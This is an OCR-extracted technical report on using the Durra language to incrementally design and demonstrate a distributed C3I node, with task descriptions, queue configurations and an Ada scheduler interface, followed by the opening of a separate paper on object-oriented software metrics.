A great deal of effort has been devoted to the development of improved software development process models. As described in [5], models have evolved from the early "code-and-fix" model, through the "stagewise" and "waterfall" models (which attempt to bring order to the process by recognizing formal steps in the process), through the "evolutionary" and "transform" models (which attempt to address the need for experimentation, refinement of requirements, and automation of the code generation phase.) The spiral model of the software process has evolved over several years at TRW, based on experience on a number of large software projects and, as indicated in [5], accommodates most previous models as special cases.
The spiral model is basically a refinement of the classical waterfall model, providing for successive applications of the original model (requirements, design, development, testing, etc.) to progressively more concrete versions of the final product.
One of the advantages of this model is that it allows the identification of areas of uncertainty that are significant sources of risk. Once these critical areas are identified, the spiral model allows for the selective application of an appropriate development strategy to these risk areas first. Thus, while at first sight the spiral model looks no better than the waterfall model, a key difference is that the spiral allows the designers to concentrate on selected problem areas rather than following a predetermined order. Once the highest-risk problem has been taken care of, the next higher risk area can be attacked, and so on.
To be successful, any approach based on successive refinements, such as the spiral model, must be supported by tools appropriate to the task at hand. Users of the spiral model must be able to selectively identify high-risk components of the product, establish their requirements, and then carry out the design, coding, and testing phases. Notice that it is not necessary that this process be carried out through the testing phase -- higher-risk components might be identified in the process and these components must be given higher priority, suspending the development process of the formerly riskier component.
4.1. Durra as a Tool for Successive Refinement
The programming paradigm embodied in Durra fits very naturally this style of software development. Although we don't claim to have solved all problems or identified all the necessary tools, we would like to suggest that a language like Durra would be of great value in the context of the spiral model. It would allow the designer to build mock-ups of an application, starting with a gross decomposition into tasks described by templates that are specified by their interface and behavioral properties. Once this is completed, the application can be emulated using tools like MasterTask [4] as a stand-in for the yet-to-be-written task implementations.
The result of the emulation would identify areas of risk in the form of tasks whose timing
specifications are more critical or demanding. In other words, the purpose of this initial emulation is to identify the component task more likely to affect the performance of the entire system. The designers can then experiment by writing alternative behavioral specifications for the offending task until a satisfactory specification (i.e., template) is obtained. Once this is achieved, the designers can proceed by replacing the original task descriptions with more detailed templates, consisting of internal tasks and queues, using the structure description features of Durra. These more refined application descriptions can again be emulated, experimenting with alternative behavioral specifications of the internal tasks, until a satisfactory internal structure (i.e., decomposition) has been achieved. This process can be repeated as often as necessary, varying the degree of refinement of the tasks, and even backtracking if a dead-end is reached. It is not necessary to start coding a task until later, when its specifications are acceptable, and when the designers decide that it should not be further decomposed.
Of course, it is quite possible that a satisfactory specification might be impossible to meet and a task implementation might have to be rejected. The designers would then have to backtrack to an earlier, less detailed design and try alternative specifications, or even alternative decompositions of a parent subsystem. This is possible because we are following a strictly top-down approach. The effect of a change in an inner task would be reflected in its impact on the behavioral specifications of a parent task. The damage is, in sense, contained and can not spread to other parts of the design.
4.2. Incremental Development of the C^3I Node
To illustrate an incremental development process using Durra, in this section we will show three alternative development sequences for the C^3I node. In all three cases we start from the same basic configuration for the node shown in Figure 4-1. The node consists of four subsystems: System Manager, Communications, Application Message Handler, and Workstation.
These subsystems correspond to the first four process declarations in the structure of the Durra application description in Figure 4-1. In addition, the application description declares two auxiliary tasks which are used for communications between the system manager and the communication and application message handler subsystems. These auxiliary tasks broadcast commands from the system manager to the other two subsystems, and merge their responses to the system manager. The queue declarations in the Figure connect the task ports in the appropriate manner.
For brevity, we are not showing a simpler configuration that could have been our initial design. For example, we could have started with a node consisting of two subsystems: (combined) Communications, and Workstation. A first step could be to divide the first subsystem into three components: System Manager, Application Message Handler, and Communications proper. We take this as our initial design.
task configuration
structure
process
-- real system processes
sm : task system_manager;
com : task comm;
amh : task amhs;
wp : task wkstn;
-- auxiliary system processes
bc : task broadcast -- command broadcast
ports
inl : in system_command;
out1, out2 : out system_command;
end broadcast;
mg : task merge -- response multiplexor
ports
inl, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
queues
-- system command propagation
q_c1 : sm.SM_Out >> bc.inl;
q_c2 : bc.outl >> com.SM_Commands;
q_c3 : bc.out2 >> amh.SM_Commands;
-- subsystem response propagation
q_r1 : com.SM_Responses >> mg.in1;
q_r2 : amh.SM_Responses >> mg.in2;
q_r3 : mg.out1 >> sm.SM_In;
-- inbound message propagation
q_i1 : com.Inbound >> amh.COMM_Inbound;
q_i2 : amh.WS_Inbound >> wp.Inbound;
-- outbound message propagation
q_o1 : wp.Outbound >> amh.WS_Outbound;
q_o4 : amh.COMM_Outbound >> com.Outbound;
end configuration;
Figure 4-1: Initial Application Description
Figure 4-2 shows the tasks descriptions for the subsystems of the initial configuration. Since at this stage of the development we might not be ready to commit to any particular structure for the subsystems, these are described as simple, unstructured tasks. This information is sufficient to do static checks, including port (i.e., type) compatibility and graph connectivity. We could continue the design in this fashion, successively refining the subsystem descriptions until, at the end, the application is fully described as a hierarchical graph structure in which the innermost nodes are implemented as separate programs, specified by the "implementation" attribute of the corresponding task description.
However, if we want to carry out some preliminary dynamic tests, we need to provide a pseudo-implementation for each subsystem. That is, we need to write ad hoc programs that emulate the input/output behavior of each of the subsystems and then specify these programs as the "implementation" attributes in the subsystem task descriptions. Alternatively, if a subsystem's behavior is relatively simple and repetitive, we could use "MasterTask" [4] as a subsystem emulator. To use MasterTask, we need to include a timing expression in the subsystem task description, and specify "master" as its "implementation" attribute. In fact, we can mix the two approaches and have some subsystems emulated by ad hoc programs, while other subsystems are emulated via MasterTask, as shown in Figure 4-2.
Figures 4-4, 4-5, and 4-6 show three possible design sequences starting from the original design of Figure 4-1 and ending with the final design shown in Figure 4-3. In Figure 4-4 we first replicate the workstation, then we decompose the communication and application message handlers, and finally we decompose the workstations. In Figure 4-5 we first decompose the communication and application message handler subsystems, then we replicate the workstation, and finally we decompose the workstation. In Figure 4-6 we carry out the design in yet a different order. First we decompose the communication and application message handler subsystems, then we decompose the workstation, and finally we replicate the workstation.
There are a number of other alternative design sequences leading to the same final design and we do not need to belabor the point.
task system_manager
ports
SM_In : in subsystem_response;
SM_Out : out system_command;
attributes
implementation = "system_manager_emulator";
processor = "Vax";
end system_manager;
a -- System Manager Subsystem
task comm
-- red communications processing
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
Inbound : out comm_if_message;
Outbound : in comm_if_message;
attributes
implementation = "comm_emulator";
processor = "Vax";
end comm;
b -- Communications Subsystem
task AMHS
-- Automated Message Handling Subsystem
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
COMM_Inbound : in comm_if_message;
COMM_Outbound: out comm_if_message;
WS_Inbound : out workstation_if_message;
WS_Outbound : in comm_if_message;
attributes
implementation = "amhs_emulator";
processor = "Vax";
end AMHS;
c -- Application Message Handler Subsystem
task wkstn
ports
Inbound : in workstation_if_message;
Outbound: out comm_if_message;
behavior
timing
loop
( (Inbound.dequeue delay[5, 60]) ||
(delay[*, 180] Outbound.enqueue) );
attributes
implementation = "master";
processor = "Vax";
end wkstn;
d -- Workstation Subsystem
Figure 4-2: Initial Task Descriptions
Figure 4-3: Final Structure of the C³I Node
Figure 4-4: Incremental Development of the C³I Node — Sequence 1
Figure 4-5: Incremental Development of the C³I Node — Sequence 2
Figure 4-6: Incremental Development of the C³I Node — Sequence 3
5. Conclusions and Future Developments
This report contains the results of the first phase of a joint project between the Software Engineering Institute and TRW Defense Systems Group. The objective of this project is to demonstrate a new technology for developing distributed applications on networks of heterogeneous machines. We have chosen as the initial application domain prototype C³I applications built using the C³I testbed developed by TRW and the Durra language and methodology developed by the SEI.
To help provide direction to the effort and to evaluate our progress we identified three major phases: Basic Demonstration, Study of Networking Issues, and Advanced Demonstration. This report describes the results of the first phase. The second and third phases will be the subject of a report scheduled for the fall of 1989.
5.1. Basic Demonstration
The goal of the first phase was to demonstrate the basic functionality of a command and control application developed using Durra and the capability of supporting heterogeneous networking. In addition to demonstrating the application development methodology, the sample applications developed for the demonstration will provide an experimental facility for future performance measurements and evaluations. We accomplished this goal through several intermediate subgoals:
Defined common communication/scheduler primitives. The Durra model of computation assumes the use of a small set of message passing primitive operations. The TRW testbed tasks also use a message passing paradigm but their original interface was not as narrowly defined as in Durra. The narrow interface was adopted as the first step of the project and we modified the testbed software to use the Durra scheduler interface.
Developed Durra descriptions of C³I tasks, subsystems, and node. We analyzed the testbed modules and developed Durra descriptions of the tasks. Writing these descriptions required an understanding of the behavior of the testbed tasks, their performance and communication requirements (ports and message types), and the structure of typical applications in the C³I domain. We also developed Durra descriptions of the subsystems, defined by TRW as the architecture of the C³I node.
Demonstrated the methodology. All of the Durra task descriptions and the modified testbed modules were compiled and the distributed C³I node executed as expected, on the computer networks at the SEI and at TRW Defense Systems Group, using two types of workstations (MicroVax and Sun), two versions of UNIX (Ultrix-32 and BSD-4.3), and two versions of X windows (X10 and X11).
5.2. Study of Advanced Networking Issues
Following the successful demonstration of the basic methodology, we need to explore the extension or modification of the Durra paradigm of networking to meet more realistic C^3I requirements.
**System robustness issues.** The current implementation of Durra uses a centralized scheduler. This was done mostly for expediency, to get the system up and running in a short time. It was always understood that a centralized critical resource was not acceptable as a long term solution. We are in the process of designing and implementing a distributed scheduler to enhance the reliability and availability of the applications.
**Dynamic application startup/reconfiguration.** The initial reconfiguration features of Durra are based on a preset (i.e., compile time) description of the conditions for a change and the nature of the change in the configuration of an application. This model might be too restrictive for a number of applications, and we will investigate the issues involved in developing an *interactive scheduler interface* to allow human operators to invoke arbitrary application reconfigurations.
**Default reconfiguration actions.** These two styles of reconfiguration (preset and interactive) might not be adequate to cope with all possible system anomalies that would trigger a reconfiguration. A Durra description that would attempt to cover all possible anomalies will be unwieldy, unreadable, and most likely incomplete. By the same token, an operator might be swamped by the speed of events or confused as to the best action to take under real-time conditions. Thus, there is need for default reconfiguration actions to be followed by the scheduler. These defaults should not be built-in but rather should be a property of the application and might vary over time, during the life of the application. We will investigate appropriate policies for taking default reconfiguration actions and the languages for specifying these policies.
5.3. Advanced Demonstration
The goal of this phase will be to demonstrate dynamic reconfiguration features (preset and interactive) to support fault tolerance. This is planned to be completed by September 1989. To achieve this goal, we have adopted the following intermediate subgoals:
**Demonstrate preset dynamic reconfiguration.** Augment the Durra application descriptions developed during the first phase (these descriptions are contained in this report) with dynamic reconfiguration statements. This requires the identification of typical reconfiguration requirements in C^3I applications and their expression in Durra.
**Develop/demonstrate Interactive dynamic reconfiguration.** We will implement a *system operator* program to allow direct communication between an operator and the runtime scheduler. This program will consist primarily of a simple user interface and a command interpreter that will take requests from an operator and will translate these into scheduler instructions to perform interactive reconfigurations.
Develop/demonstrate policy language concepts. We will implement a simple policy language and associated mechanisms to handle system anomalies when neither the preset nor interactive reconfiguration facilities are adequate.
References
Durra: A Task-Level Description Language.
Programming at the Processor-Memory-Switch Level.
The Durra Runtime Environment.
MasterTask: The Durra Task Emulator.
A Spiral Model of Software Development and Enhancement.
Appendix A: C³I Node Application Description
task configuration
structure
process
-- real system processes
sm : task system_manager;
com : task comm;
amh : task amhs;
wlp : task wkstn;
w2p : task wkstn;
-- auxiliary system processes
dmxp: task broadcast -- message demultiplexor
ports
inl : in workstation_if_message;
outl, out2 : out workstation_if_message;
end broadcast;
muxp: task merge -- message multiplexor
ports
outl : out comm_if_message;
inl, in2 : in comm_if_message;
attribute
mode = fifo;
end merge;
bc : task broadcast -- command broadcast
ports
inl : in system_command;
outl, out2 : out system_command;
end broadcast;
mg : task merge -- response multiplexor
ports
inl, in2 : in subsystem_response;
outl : out subsystem_response;
attribute
mode = fifo;
end merge;
queues
-- system command propagation
q_c1 : sm.SM_Out >> bc.inl;
q_c2 : bc.out1 >> com.SM_Commands;
q_c3 : bc.out2 >> amh.SM_Commands;
-- subsystem response propagation
q_r1 : com.SM_Responses >> mg.in1;
q_r2 : amh.SM_Responses >> mg.in2;
q_r3 : mg.out1 >> sm.SM_In;
-- inbound message propagation
q_i1 : com.Inbound >> amh.COMM_Inbound;
q_i2 : amh.WS_Inbound >> dmxp.inl;
q_i3 : dmxp.out1 >> wlp.Inbound;
q_i4 : dmxp.out2 >> w2p.Inbound;
-- outbound message propagation
q_o1 : wlp.Outbound >> muxp.inl;
q_o2 : w2p.Outbound >> muxp.in2;
q_o3 : muxp.out1 >> amh.WS_Outbound;
q_o4 : amh.COMM_Outbound >> com.Outbound;
end configuration;
Appendix B: Application Message Handler Description
B.1. Subsystem Description
task AMHS
-- Automated Message Handling Subsystem
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
COMM_Inbound : in comm_if_message;
COMM_Outbound : out comm_if_message;
WS_Inbound : out workstation_if_message;
WS_Outbound : in comm_if_message;
structure
process
ac : task AMHS_control;
ai : task AMHS_inbound;
ao : task AMHS_outbound;
pb : task broadcast
port
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = ac.SM_In;
SM_Responses = ac.SM_Out;
COMM_Inbound = ai.COMM_Inbound;
COMM_Outbound = ao.COMM_Outbound;
WS_Inbound = ai.WS_Inbound;
WS_Outbound = ao.WS_Outbound;
queue
q1 : ac.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ai.Cmd_In;
q3 : pb.out2 >> ao.Cmd_In;
q4 : ai.Resp_Out >> pm.in1;
q5 : ao.Resp_Out >> pm.in2;
q6 : pm.out1 >> ac.Resp_In;
end AMHS;
B.2. Component Task Descriptions
B.2.1. Control Task
```plaintext
task amhs_control
ports
SM_In : in system_command;
SM_Out : out subsystem_response;
Cmd_Out : out system_command;
Resp_In : in subsystem_response;
attributes
implementation = "amh_control";
x10window = "80x12+0+0";
x11window = "-geometry 80x12+0+0";
processor = sun;
end amhs_control;
```
B.2.2. Inbound Message Task
```plaintext
task amhs_inbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
COMM_Inbound : in comm_if_message;
WS_Inbound : out workstation_if_message;
attributes
implementation = "amh_inbound";
x10window = "80x12+0+190";
x11window = "-geometry 80x12+0+190";
processor = sun;
end amhs_inbound;
```
B.2.3. Outbound Message Task
```plaintext
task amhs_outbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
COMM_Outbound : out comm_if_message;
WS_Outbound : in comm_if_message;
attributes
implementation = "amh_outbound";
x10window = "80x12+0+380";
x11window = "-geometry 80x12+0+380";
processor = sun;
end amhs_outbound;
```
Appendix C: Communications
C.1. Subsystem Description
task comm
-- red communications processing
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
Inbound : out comm_if_message;
Outbound : in comm_if_message;
structure
procass
cc : task comm_control;
ci : task comm_inbound;
co : task comm_outbound;
pb : task broadcast
port
inl : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
inl, in2 : in subsystem_response;
outl : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = cc.SM_In;
SM_Responses = cc.SM_Out;
Inbound = ci.Inbound;
Outbound = co.Outbound;
queue
q1 : cc.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ci.Cmd_In;
q3 : pb.out2 >> co.Cmd_In;
q4 : ci.Resp_Out >> pm.in1;
q5 : co.Resp_Out >> pm.in2;
q6 : pm.out1 >> cc.Resp_In;
q7 : co.Echo_Out >> ci.Echo_In;
end comm;
C.2. Component Task Descriptions
C.2.1. Control Task
```plaintext
task comm_control
ports
SM_In : in system_command;
SM_Out : out subsystem_response;
Cmd_Out : out system_command;
Resp_In : in subsystem_response;
attributes
implementation = "rcom_control";
x10window = "=80x12+510+0";
x11window = "-geometry 80x12+510+0";
processor = sun;
end comm_control;
```
C.2.2. Inbound Message Task
```plaintext
task comm_inbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
Inbound : out comm_if_message;
Echo_In : in comm_if_message;
attributes
implementation = "rcom_inbound";
x10window = "=80x12+510+190";
x11window = "-geometry 80x12+510+190";
processor = sun;
end comm_inbound;
```
C.2.3. Outbound Message Task
```plaintext
task comm_outbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
Outbound : in comm_if_message;
Echo_Out : out comm_if_message;
attributes
implementation = "rcom_outbound";
x10window = "=80x12+510+380";
x11window = "-geometry 80x12+510+380";
processor = sun;
end comm_outbound;
```
task system_manager
ports
SM_In : in subsystem_response;
SM_Out : out system_command;
attributes
implementation = "system_manager";
x10window = "=80x12+200+570";
x11window = "--geometry 80x12+200+570";
processor = sun;
end system_manager;
Appendix E: Workstation Description
To preserve proprietary information, we do not show the various tasks constituting the user's workstation subsystem. For the purposes of our demonstration, their functions were carried out by the workstation manager task.
E.1. Subsystem Description
```plaintext
task wkstn
ports
Inbound : in workstation_if_message;
Outbound : out comm_if_message;
structure
process
wm: task wkstn_manager;
bind
Inbound = wm.Inbound;
Outbound = wm.Outbound;
end wkstn;
```
E.2. Component Task Descriptions
E.2.1. Manager Task
```plaintext
task wkstn_manager
ports
Inbound : in workstation_if_message;
Outbound : out comm_if_message;
attributes
processor = sun;
x10window = "-80x12+0+740";
x11window = "-geometry 80x12+0+740";
implementation = "usi_sim";
end wkstn_manager;
```
Appendix F: Type Declarations
```
type byte is size 8;
type comm_if_message is array of byte;
type string is array of byte;
type subsystem_response is array of byte;
type system_command is array of byte;
type workstation_if_message is array of byte;
```
Appendix G: Scheduler Interface for Ada Task Implementations
with system; use system;
package Interface is
-- | Durra Scheduler Interface (Low Level)
-- |
-- | This package provides the interface to the Durra scheduler for tasks
-- | written in Ada;
-- |
-- | The init_* variables are the parameters passed by the server when a
-- | task is initialized. The server in turn gets them from the scheduler.
-- REVISION HISTORY
-- 01/03/88 mrb Package spec created.
-- 06/13/88 dd Test_Port expanded to separate routines for
-- input and output ports.
-- 07/5/88 dd Constant environment names changed to function calls.
function User_Task_Name return STRING;
function Scheduler_Host return STRING;
function Scheduler_Port return STRING;
function User_Process_ID return STRING;
function Scheduler_Debug_Level return STRING;
function User_Source_Paramet return STRING;
procedure Finish;
procedure Get_Port (Port_ID : in POSITIVE;
Data : in System.Address;
Data_Size : out NATURAL;
Type_ID : out NATURAL);
procedure Get_PortId (Port_Name : in STRING;
Port_ID : out POSITIVE;
Queue_Bound : out POSITIVE;
Data_Size : out NATURAL);
procedure Get_TypeId (Type_Name : in STRING;
Type_ID : out NATURAL;
Type_Size : out NATURAL);
procedure Init;
procedure Send_Port (Port_ID : in POSITIVE;
Data : in System.Address;
Data_Size : in NATURAL;
Type_ID : in NATURAL);
procedure Test_Input_Port (Port_ID : in POSITIVE;
Type_of_Next_Input : out NATURAL;
Size_of_Next_Input : out NATURAL;
Inputs_in_Queue : out NATURAL);
procedure Test_Output_Port (Port_ID : in POSITIVE;
Spaces_Available : out NATURAL);
end Interface;
Abstract: Durra is a language designed to support the construction of distributed applications using concurrent, coarse-grain tasks running on networks of heterogeneous processors. An application written in Durra describes the tasks to be instantiated and executed as concurrent processes, the types of data to be exchanged by the processes, and the intermediate queues required to store the data as they move from producer to consumer processes.
This report describes an experiment in implementing a command, control, communications, and intelligence (C3) node using reusable components. The experiment involves writing task descriptions and type declarations for a subset of the TRW testbed, a collection of C3 software modules developed by TRW Defense Systems Group. The experiment illustrates the development of a typical Durra application. This is a three-step process: first, a collection of tasks (programs) is
This report illustrates the methodology for building complex, distributed systems supported by Durra. It does not, however, illustrate all the features of the language; in particular, it does not illustrate those features that support dynamic, but planned, reconfiguration of a running application, or those features supporting unplanned dynamic reconfigurations as a means to support fault tolerance. These considerations are the subject of current design and development and will be the subject of a future report.
|
{"Source-Url": "https://apps.dtic.mil/dtic/tr/fulltext/u2/a206575.pdf", "len_cl100k_base": 15573, "olmocr-version": "0.1.53", "pdf-total-pages": 63, "total-fallback-pages": 0, "total-input-tokens": 111150, "total-output-tokens": 18770, "length": "2e13", "weborganizer": {"__label__adult": 0.0002894401550292969, "__label__art_design": 0.00024235248565673828, "__label__crime_law": 0.00022530555725097656, "__label__education_jobs": 0.00047516822814941406, "__label__entertainment": 5.3822994232177734e-05, "__label__fashion_beauty": 0.0001169443130493164, "__label__finance_business": 0.0002142190933227539, "__label__food_dining": 0.0002410411834716797, "__label__games": 0.0005106925964355469, "__label__hardware": 0.001369476318359375, "__label__health": 0.00023627281188964844, "__label__history": 0.00022149085998535156, "__label__home_hobbies": 7.56978988647461e-05, "__label__industrial": 0.0005087852478027344, "__label__literature": 0.0001571178436279297, "__label__politics": 0.00017321109771728516, "__label__religion": 0.0003075599670410156, "__label__science_tech": 0.018463134765625, "__label__social_life": 5.453824996948242e-05, "__label__software": 0.00768280029296875, "__label__software_dev": 0.96728515625, "__label__sports_fitness": 0.0002269744873046875, "__label__transportation": 0.000514984130859375, "__label__travel": 0.0001583099365234375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 71571, 0.02152]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 71571, 0.5059]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 71571, 0.85823]], "google_gemma-3-12b-it_contains_pii": [[0, 208, false], [208, 586, null], [586, 586, null], [586, 1895, null], [1895, 2801, null], [2801, 4127, null], [4127, 7134, null], [7134, 7938, null], [7938, 9921, null], [9921, 11559, null], [11559, 14145, null], [14145, 14777, null], [14777, 15583, null], [15583, 18074, null], [18074, 19734, null], [19734, 22802, null], [22802, 25980, null], [25980, 26036, null], [26036, 26087, null], [26087, 26141, null], [26141, 28880, null], [28880, 29075, null], [29075, 29075, null], [29075, 31429, null], [31429, 34670, null], [34670, 36575, null], [36575, 38442, null], [38442, 39998, null], [39998, 41118, null], [41118, 42643, null], [42643, 42674, null], [42674, 45726, null], [45726, 48827, null], [48827, 50041, null], [50041, 52396, null], [52396, 53706, null], [53706, 53750, null], [53750, 53815, null], [53815, 53880, null], [53880, 53945, null], [53945, 53945, null], [53945, 56563, null], [56563, 59598, null], [59598, 59821, null], [59821, 59821, null], [59821, 60753, null], [60753, 60753, null], [60753, 62403, null], [62403, 62403, null], [62403, 63466, null], [63466, 64574, null], [64574, 65671, null], [65671, 66774, null], [66774, 67031, null], [67031, 67031, null], [67031, 67905, null], [67905, 67905, null], [67905, 68160, null], [68160, 68160, null], [68160, 70136, null], [70136, 70136, null], [70136, 71055, null], [71055, 71571, null]], "google_gemma-3-12b-it_is_public_document": [[0, 208, true], [208, 586, null], [586, 586, null], [586, 1895, null], [1895, 2801, null], [2801, 4127, null], [4127, 7134, null], [7134, 7938, null], [7938, 9921, null], [9921, 11559, null], [11559, 14145, null], [14145, 14777, null], [14777, 15583, null], [15583, 18074, null], [18074, 19734, null], [19734, 22802, null], [22802, 25980, null], [25980, 26036, null], [26036, 26087, null], [26087, 26141, null], [26141, 28880, null], [28880, 29075, null], [29075, 29075, null], [29075, 31429, null], [31429, 34670, null], [34670, 36575, null], [36575, 38442, null], [38442, 39998, null], [39998, 41118, null], [41118, 42643, null], [42643, 42674, null], [42674, 45726, null], [45726, 48827, null], [48827, 50041, null], [50041, 52396, null], [52396, 53706, null], [53706, 53750, null], [53750, 53815, null], [53815, 53880, null], [53880, 53945, null], [53945, 53945, null], [53945, 56563, null], [56563, 59598, null], [59598, 59821, null], [59821, 59821, null], [59821, 60753, null], [60753, 60753, null], [60753, 62403, null], [62403, 62403, null], [62403, 63466, null], [63466, 64574, null], [64574, 65671, null], [65671, 66774, null], [66774, 67031, null], [67031, 67031, null], [67031, 67905, null], [67905, 67905, null], [67905, 68160, null], [68160, 68160, null], [68160, 70136, null], [70136, 70136, null], [70136, 71055, null], [71055, 71571, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 71571, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 71571, null]], "pdf_page_numbers": [[0, 208, 1], [208, 586, 2], [586, 586, 3], [586, 1895, 4], [1895, 2801, 5], [2801, 4127, 6], [4127, 7134, 7], [7134, 7938, 8], [7938, 9921, 9], [9921, 11559, 10], [11559, 14145, 11], [14145, 14777, 12], [14777, 15583, 13], [15583, 18074, 14], [18074, 19734, 15], [19734, 22802, 16], [22802, 25980, 17], [25980, 26036, 18], [26036, 26087, 19], [26087, 26141, 20], [26141, 28880, 21], [28880, 29075, 22], [29075, 29075, 23], [29075, 31429, 24], [31429, 34670, 25], [34670, 36575, 26], [36575, 38442, 27], [38442, 39998, 28], [39998, 41118, 29], [41118, 42643, 30], [42643, 42674, 31], [42674, 45726, 32], [45726, 48827, 33], [48827, 50041, 34], [50041, 52396, 35], [52396, 53706, 36], [53706, 53750, 37], [53750, 53815, 38], [53815, 53880, 39], [53880, 53945, 40], [53945, 53945, 41], [53945, 56563, 42], [56563, 59598, 43], [59598, 59821, 44], [59821, 59821, 45], [59821, 60753, 46], [60753, 60753, 47], [60753, 62403, 48], [62403, 62403, 49], [62403, 63466, 50], [63466, 64574, 51], [64574, 65671, 52], [65671, 66774, 53], [66774, 67031, 54], [67031, 67031, 55], [67031, 67905, 56], [67905, 67905, 57], [67905, 68160, 58], [68160, 68160, 59], [68160, 70136, 60], [70136, 70136, 61], [70136, 71055, 62], [71055, 71571, 63]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 71571, 0.03351]]}
|
olmocr_science_pdfs
|
2024-12-06
|
2024-12-06
|
174652f1b82130995ce24a1f00ecffd38dd3a008
|
An Improved Suite of Object Oriented Software Measures
By Ralph D. Neal, Roland Weistroffer, and Richard J. Coppins
An Improved Suite of Object Oriented Software Measures
Ralph D. Neal, H. Roland Weistroffer, and Richard J. Coppins
June 27, 1997
This technical report is a product of the National Aeronautics and Space Administration (NASA) Software Program, an agency wide program to promote continual improvement of software engineering within NASA. The goals and strategies of this program are documented in the NASA software strategic plan, July 13, 1995.
Additional information is available from the NASA Software IV&V Facility on the World Wide Web site http://www.ivv.nasa.gov/
This research was funded under cooperative Agreement #NCC 2-979 at the NASA/WVU Software Research Laboratory.
An Improved Suite of Object Oriented Software Measures
Ralph D. Neal
West Virginia University
H. Roland Weistroffer
Virginia Commonwealth University
School of Business, Richmond, VA 23284-4000
Richard J. Coppins
Virginia Commonwealth University
School of Business, Richmond, VA 23284-4000
Abstract
In the pursuit of ever increasing productivity, the need to be able to measure specific aspects of software is generally agreed upon. As object oriented programming languages are becoming more and more widely used, metrics specifically designed for object oriented software are required. In recent years there has been an explosion of new, object oriented software metrics proposed in the literature. Unfortunately, many or most of these proposed metrics have not been validated to measure what they claim to measure. In fact, an analysis of many of these metrics shows that they do not satisfy basic properties of measurement theory, and thus their application has to be suspect. In this paper ten improved metrics are proposed and are validated using measurement theory.
Introduction
In the early days of computer applications, software development was best described as art, rather than science. The absence of design guidelines often resulted in spaghetti code that was unintelligible to those charged with maintaining the software. In the pursuit of greater productivity, software development eventually became more structured and evolved into the field of software engineering. Part of the engineering concept is that the characteristics of the product must be controllable, and DeMarco [4] reminds us that what is to be controlled must be measured.
Measurement is the process whereby numbers or symbols are assigned to dimensions of entities in such a manner as to describe the dimension in a meaningful way. For example, inches or centimeters are meaningful in measuring the dimension height of the entity person. They are not meaningful however, to measure the age of a person. A requirement of meaningful measurement is that intuitive and empirical assessments of the entities and dimensions are preserved. For
example, when measuring the height of two people, the taller person should be assigned the larger value. A further requirement for meaningfulness is some model that defines how measurements are to be taken. For example, should posture be taken into consideration when measuring human height? Should shoes be allowed? Should the height be measured to the top of the head or the top of the hair? The model is necessary because a reasonable consensus by the measurers is needed [6].
Software development continues to evolve. In recent years, object oriented programming languages have become widely accepted, and to some extend the concepts of structured programming are being replaced or augmented by object oriented concepts. Object oriented software is organized as a collection of objects, where objects are entities that combine both data structure and behavior. By contrast, data structures and behavior are only loosely connected in traditional, structured programming (see for example [13]). Though there is no general agreement among authors on all the characteristics and on the exact terminology that define the object oriented paradigm, object oriented models can be summarized by the three properties of encapsulation, abstraction, and polymorphism [7]. Encapsulation, sometimes also called information hiding, refers to the concept of combining data and functions into objects, thus hiding the specifics from the user, who is given a more conceptual view of the objects, independent of implementation details. Abstraction refers to the grouping of objects with similar properties into classes. Common properties are described at the class level. A class may possess subclasses that describe further properties. Multiple levels of subclasses are allowed. Polymorphism is the ability of an object to interpret a message according to the properties of its class. The same message may result in different actions, depending on the class or subclass that contains the object. Subclasses inherit all the properties of their super classes, but may have additional properties not defined in the super class.
Because object oriented software has distinctly different characteristics from traditional, structured programs, different metrics are needed for object oriented software. Few such metrics were available until just a few years ago, but recently there has been an avalanche of newly proposed metrics [3] [9] [10]. Unfortunately, few of these metrics have been validated beyond some regression analysis of observed behavior.
Validation of a software metric is showing that the metric is a proper numerical characterization of the claimed dimension [1] [5]. Zuse [16] did an extensive validation and classification of conventional software metrics, using measurement theory. Neal [11] did a similar study for object oriented metrics and found that many of the proposed metrics cannot be considered valid measures of the dimension they claim to measure. The current paper proposes a suite of ten new metrics which have been validated using measurement theory, and which may replace some of those earlier published metrics that were not found to be valid measures.
The rest of this paper is organized as follows: In the next section, a model based on measurement theory and modified from Zuse's model [16] [17] [19] is described, for validating object oriented software metrics. Following that, ten new metrics are introduced and classified, based on this model.
**The Validation Model**
